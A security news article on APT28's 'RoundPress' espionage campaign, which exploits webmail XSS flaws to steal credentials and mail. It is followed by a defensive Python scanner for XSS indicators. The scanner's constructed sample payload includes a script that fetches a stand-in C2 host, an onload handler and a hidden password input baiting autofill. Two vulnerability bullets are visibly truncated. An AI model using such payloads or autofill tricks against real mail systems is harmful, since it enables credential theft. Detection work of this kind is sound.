Government webmail hacked through XSS bugs in global spy campaign

Hackers are running a worldwide cyberespionage campaign dubbed ‘RoundPress,’ leveraging zero-day and n-day flaws in webmail servers to steal email from high-value government organizations.

ESET researchers who uncovered the operation attribute it with medium confidence to the Russian state-sponsored hackers APT28 (aka “Fancy Bear” or “Sednit”).

The campaign began in 2023 and continued with the adoption of new exploits in 2024, targeting Roundcube, Horde, MDaemon, and Zimbra.

Notable targets include governments in Greece, Ukraine, Serbia, and Cameroon, military units in Ukraine and Ecuador, defense companies in Ukraine, Bulgaria, and Romania, and critical infrastructure in Ukraine and Bulgaria.

RoundPress targets (Source: ESET)

Open email, have data stolen

The attack begins with a spear-phishing email referencing current news or political events, often including excerpts from news articles to add legitimacy.

A malicious JavaScript payload embedded in the HTML body of the email triggers the exploitation of a cross-site scripting (XSS) vulnerability in the webmail browser page used by the recipient.

All that is needed from the victim is to open the email to view it, as no other interaction, clicks, redirections, or data input is required for the malicious JavaScript to execute.

Attack chain overview (Source: ESET)

The payload has no persistence mechanism, so it only executes when the malicious email is opened.

The script creates invisible input fields to trick browsers or password managers into autofilling saved credentials for the victim’s email accounts.

Credential stealer function (Source: ESET)

Additionally, it reads the DOM or sends HTTP requests to collect email message content, contacts, webmail settings, login history, two-factor authentication data, and passwords.

The data is then exfiltrated to hardcoded command-and-control (C2) addresses using HTTP POST requests.

Each script has a slightly different set of capabilities, adjusted for the product it targets.

Vulnerabilities targeted

Operation RoundPress targeted several XSS flaws in webmail products commonly used by important organizations in order to inject its malicious JavaScript.

The exploitation ESET associated with this campaign involves the following flaws:

  • Roundcube – CVE-2020-35730: A stored XSS flaw the hackers used in 2023 by embedding JavaScript directly into the body of an email. When victims opened the email in a browser-based webmail session, the script executed in their context, enabling credential and data theft.
  • Roundcube – CVE-2023-43770: An XSS vulnerability in how Roundcube handled link text, leveraged in early 2024. Improper sanitization allowed attackers to inject
  • MDaemon – CVE-2024-11182: A zero-day XSS flaw in the MDaemon Email Server’s HTML parser, exploited by the hackers in late 2024. By crafting a malformed title attribute with a noembed tag, attackers could render a hidden payload, executing JavaScript. This enabled credential theft, 2FA bypass, and persistent access via App Passwords.
  • Horde – Unknown XSS: APT28 attempted to exploit an old XSS vulnerability in Horde by inserting a script in an handler. However, the attempt failed, probably due to built-in filtering in modern Horde versions. The exact flaw is unconfirmed but appears to have been patched in the meantime.
  • Zimbra – CVE-2024-27443: An XSS vulnerability in Zimbra’s calendar invite handling, which had not been tagged as actively exploited before. Unsanitized input from the X-Zimbra-Calendar-Intended-For header allowed JavaScript injection into the calendar UI. APT28 embedded a hidden script that decoded and executed base64 JavaScript when the invite was viewed.

Although ESET does not report any RoundPress activity for 2025, the hackers’ methods could easily be applied to this year too, as there is a constant supply of new XSS flaws in popular webmail products.
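The attack chain above (script in the HTML body, invisible inputs baiting autofill, the noembed trick) gives a mail gateway or SOC concrete constructs to look for before a message is ever rendered. The following scanner is an added example, not code from ESET or from any of the webmail projects named here; it uses only the Python standard library, and the two sample bodies are constructed for the demo.

```python
from html.parser import HTMLParser

# Tags the report ties to the campaign's payloads (script bodies, noembed trick).
SUSPICIOUS_TAGS = {"script", "noembed", "iframe"}

class XssIndicatorScanner(HTMLParser):
    """Collects XSS indicators from an email's HTML body."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        attrs = {k.lower(): (v or "") for k, v in attrs}
        if tag in SUSPICIOUS_TAGS:
            self.findings.append(f"tag:{tag}")
        for name, value in attrs.items():
            # on* attributes (onload, onerror, ...) run script when rendered.
            if name.startswith("on"):
                self.findings.append(f"event-handler:{tag}@{name}")
            if value.strip().lower().startswith("javascript:"):
                self.findings.append(f"javascript-uri:{tag}@{name}")
        if tag == "input":
            # Invisible inputs are what the stealer uses to bait autofill.
            style = attrs.get("style", "").replace(" ", "").lower()
            if (attrs.get("type", "").lower() in ("hidden", "password")
                    or "display:none" in style
                    or "visibility:hidden" in style
                    or "opacity:0" in style):
                self.findings.append("invisible-input:" + attrs.get("name", "?"))

def scan_email_html(html):
    """Return the indicators found in one HTML body (empty list = nothing flagged)."""
    scanner = XssIndicatorScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings

# Constructed samples for the demo, not real campaign payloads.
BENIGN = ("<html><body><p>Quarterly report attached.</p>"
          "<a href='https://example.org/'>link</a></body></html>")
SUSPECT = ("<html><body><p>Breaking news excerpt</p>"
           "<noembed><img src='x' onload='x()'></noembed>"
           "<input type='password' name='pw' style='display:none'>"
           "<script>fetch('https://c2.invalid/')</script>"
           "<a href='javascript:void(0)'>x</a></body></html>")

if __name__ == "__main__":
    print(scan_email_html(BENIGN))
    print(scan_email_html(SUSPECT))
```

Legitimate HTML newsletters rarely carry any of these constructs, so a non-empty result is a reasonable quarantine or alert trigger; the real fix remains patching the webmail server and stripping active content server-side.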
